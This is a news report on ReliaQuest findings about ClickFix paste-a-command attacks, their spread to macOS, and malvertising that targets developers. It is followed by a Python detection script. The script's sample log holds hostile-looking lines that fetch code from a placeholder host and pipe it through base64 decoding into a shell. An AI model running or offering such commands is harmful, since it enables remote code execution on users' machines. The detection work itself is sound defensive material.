In the span of just two years, ClickFix has gone from an emerging social engineering technique to the overwhelming favorite among threat actors for malware delivery.

That’s according to research from ReliaQuest, which analyzed threat activity from March 1 to May 31 and found that ClickFix dominated initial access and defense-evasion categories. ClickFix, a social engineering tactic first observed in 2024, tricks targeted individuals into copying and pasting malicious commands into system dialogs like Windows Terminal.

Attackers achieve this by presenting targets with error messages or verification prompts like CAPTCHA requests, which include text-based commands to “fix” whatever the issue is. This approach bypasses traditional file scanning and email-based defenses, ReliaQuest noted.

Over the past two years, several variants of the technique have emerged, including “CrashFix,” which continually crashes users’ browsers and presents malicious commands as a remedy, and some that weaponize AI models through search engine optimization (SEO) poisoning.


ReliaQuest found not only a rise in ClickFix attacks during the three-month period but also an expansion of the technique to macOS. “This means ClickFix can no longer be handled as a special case,” Raigridas Bartkus, cybersecurity specialist at ReliaQuest, wrote in the blog post. “Training, detection, and triage for it should run continuously on both Windows and macOS.”

ClickFix Attackers Go “Atomic” With Obfuscation 

ReliaQuest researchers observed ClickFix activity on macOS systems for the first time, with the clearest example being attacks that featured the Atomic macOS Stealer, also known as AMOS. While ClickFix activity on macOS has been observed before, Bartkus said threat actors deploying AMOS in recent months shifted away from baiting victims with fake versions of pirated or cracked software.

“This period, they switched to an applescript:// link that automatically opens Script Editor, a scripting app built into macOS, and runs the attacker’s commands there,” he wrote. “The change was likely designed to bypass the warning Apple added in macOS 26.4 that appears when users paste commands into the Terminal command-line app, a warning that isn’t triggered by Script Editor.”

This means security teams need to defend macOS systems with “the same monitoring and response coverage as Windows,” Bartkus wrote.

ReliaQuest’s report also noted that ClickFix attacks drove nearly 28% of defense-evasion activity in the three-month period through command and file obfuscation techniques. The cybersecurity vendor highlighted a specific ClickFix loader designed to deliver “Deepload” malware. Bartkus said the loader likely uses AI-generated obfuscation to hide the malware’s logic under thousands of variable assignments designed to look like routine scripting.


“This helps attackers produce new variants faster and reduces defenders’ time to adapt signatures,” he added.

ClickFix Attackers Targeting Developers

One notable trend that ReliaQuest observed was that ClickFix activity appeared to shift from delivery via compromised websites to emailed links instead. It’s unclear why this shift occurred, though Bartkus noted that it theoretically favors defenders because “emailed lures must pass through the mail pipeline, where gateways, link rewriting, and sandboxing can stop them before the click.”

Despite that shift, ReliaQuest observed attackers using a variety of effective ClickFix vectors to gain initial access. For example, traditional fake CAPTCHA and verification prompts remained active on Windows, while researchers also observed phony software installation guides targeting macOS users, a company spokesperson says.

ReliaQuest also saw malvertising campaigns via Google Ads that masqueraded as developer tools, most commonly “claude code install” and “homebrew install.” When an individual clicks on a sponsored search result, the fake installation page presents an error lure and instructs them to copy and paste a malicious command. 


“The developer-targeted malvertising stands out as the highest-risk variant given the population it reaches,” the ReliaQuest spokesperson tells Dark Reading. “In multiple confirmed cases, we found exposed npm and Bitbucket tokens in process environment variables on compromised hosts, which tells you the targeting is landing on exactly the right users.”

The spokesperson also notes that ClickFix is starting to look less like a one-time delivery mechanism and more like a launchpad for modular post-exploitation. ReliaQuest observed several instances where threat actors used a single pasted command to conduct domain enumeration and establish persistent access without ever dropping malware. 

To defend against such attacks, Bartkus recommended that organizations train users on both Windows and macOS to refrain from pasting commands into Run, Terminal, or Script Editor, and simulate ClickFix lures so that employees are familiar with the threat.

Another option is to restrict users’ access to Run, Terminal, and Script Editor, which is a reasonable step for the average employee, the spokesperson says. But that approach isn’t feasible for everyone: “For developers and technical staff, blocking these tools outright would cause too much friction. These are core workflow tools and people will find workarounds. The better approach is to log and alert rather than block.”

The spokesperson added, “Monitoring for activity such as a sequence of base64 decoding, curl retrieval, and PowerShell or osascript execution, for example, would represent reliably anomalous behavior in developer environments.”
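The "log and alert" approach the spokesperson describes can be turned into a simple correlation rule. The following is an added example, not ReliaQuest's detection content: it classifies process command lines into the three stages named above (base64 decoding, curl retrieval, PowerShell or osascript execution) and alerts when all three appear on one host within a short window, whether in a single pasted command or spread over several. The regexes, the 120-second window and the JSON log lines are constructed for the example.

```python
import json
import re
from collections import defaultdict

# Stage patterns over the process command line (assumptions for this example, not a vendor rule).
STAGES = {
    "base64_decode": re.compile(r"base64\s+(-d|--decode)|FromBase64String|-(enc|encodedcommand)\b", re.I),
    "curl_fetch": re.compile(r"\bcurl\b|Invoke-WebRequest|\biwr\b", re.I),
    "script_exec": re.compile(r"\bpowershell(\.exe)?\b|\bosascript\b", re.I),
}
WINDOW_SECONDS = 120  # assumed correlation window per host

# Constructed sample process events, one JSON object per line (host, epoch seconds, command line).
SAMPLE_LOG = r"""
{"host":"mac-dev-01","ts":1000,"cmd":"osascript -e 'do shell script \"curl -fsSL http://placeholder.invalid/p | base64 -d | sh\"'"}
{"host":"win-dev-02","ts":2000,"cmd":"curl.exe -sSL https://example.org/tool.zip -o tool.zip"}
{"host":"win-dev-02","ts":2700,"cmd":"powershell -c [Convert]::FromBase64String((Get-Content cert.b64))"}
{"host":"win-dev-03","ts":3000,"cmd":"curl -s http://placeholder.invalid/p -o p.txt"}
{"host":"win-dev-03","ts":3020,"cmd":"powershell -NoProfile -EncodedCommand QUJDRA=="}
{"host":"win-dev-03","ts":3100,"cmd":"git status"}
"""


def parse_log(text):
    """Parse newline-delimited JSON process events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def classify(cmd):
    """Return the set of stage names whose pattern matches this command line."""
    return {name for name, rx in STAGES.items() if rx.search(cmd)}


def detect_sequences(events, window=WINDOW_SECONDS):
    """Per host, keep stage hits seen within `window` seconds; alert once all three stages
    are covered. win-dev-02 above does not alert because its stages are 700 s apart."""
    alerts = []
    recent = defaultdict(list)  # host -> [(ts, stages, cmd)] still inside the window
    for ev in sorted(events, key=lambda e: (e["host"], e["ts"])):
        stages = classify(ev["cmd"])
        if not stages:
            continue
        hits = recent[ev["host"]]
        hits.append((ev["ts"], stages, ev["cmd"]))
        hits[:] = [h for h in hits if ev["ts"] - h[0] <= window]  # expire old hits
        if set().union(*(h[1] for h in hits)) >= set(STAGES):
            alerts.append({"host": ev["host"], "ts": ev["ts"], "cmds": [h[2] for h in hits]})
            hits.clear()  # one alert per cluster of related commands
    return alerts


def run_sample():
    return detect_sequences(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    for a in run_sample():
        print(f"ALERT host={a['host']} ts={a['ts']} cmds={a['cmds']}")
```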
